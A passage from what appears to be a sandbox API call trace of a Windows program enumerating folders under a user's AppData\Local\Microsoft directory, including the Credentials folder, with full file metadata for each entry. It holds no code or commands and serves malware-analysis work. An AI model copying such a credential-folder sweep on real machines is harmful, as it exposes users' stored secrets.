ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8cddad0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8d03c30, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8d03c30, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~4")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d4ee530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d4ee530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0208.115] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eca0) returned 1 [0208.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef00) returned 1 [0208.116] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x36 [0208.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.116] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x36 [0208.116] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.116] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.116] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0208.116] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.117] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", lpFilePart=0x0) returned 0x30 [0208.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.117] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", lpFilePart=0x0) returned 0x30 [0208.117] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.117] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.117] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79ba73d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff107f92, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="FeedsStore.feedsdb-ms", cAlternateFileName="FEEDSS~1.FEE")) returned 1 [0208.117] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfee3456d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Feeds~", cAlternateFileName="MICROS~1")) returned 1 [0208.118] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0208.118] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 0 [0208.118] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.118] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", lpFilePart=0x0) returned 0x36 [0208.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.118] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", lpFilePart=0x0) returned 0x36 [0208.118] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.119] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfedc214c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1NBUR4HR", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfee8082e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6ASVN7J7", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff06fa11, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="D68G7BIJ", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe9e3d85, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xc8db1a10, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfed03a6b, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KQMHSVKD", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfed03a6b, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KQMHSVKD", cAlternateFileName="")) returned 0 [0208.119] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.119] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", lpFilePart=0x0) returned 0x30 [0208.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.120] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", lpFilePart=0x0) returned 0x30 [0208.120] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.121] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.121] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2d1623f0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x3c0dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="FRMCACHE.DAT", cAlternateFileName="")) returned 1 [0208.121] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0208.121] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.121] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3c [0208.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.121] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3c [0208.122] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.122] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.122] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb371c2, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x2fa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="brndlog.bak", cAlternateFileName="")) returned 1 [0208.122] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x2fa5, dwReserved0=0x0, dwReserved1=0x0, cFileName="brndlog.txt", cAlternateFileName="")) returned 1 [0208.122] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x519a8410, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8e4a11a0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x2466, dwReserved0=0x0, dwReserved1=0x0, cFileName="frameiconcache.dat", cAlternateFileName="FRAMEI~1.DAT")) returned 1 [0208.122] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dbf6cc0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x4dbf6cc0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4dbf6cc0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSIMGSIZ.DAT", cAlternateFileName="")) returned 1 [0208.122] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4d225200, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x518e9d30, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x518e9d30, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0208.122] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4d225200, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x518e9d30, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x518e9d30, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 0 [0208.122] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.123] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", lpFilePart=0x0) returned 0x37 [0208.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.123] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", lpFilePart=0x0) returned 0x37 [0208.123] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, 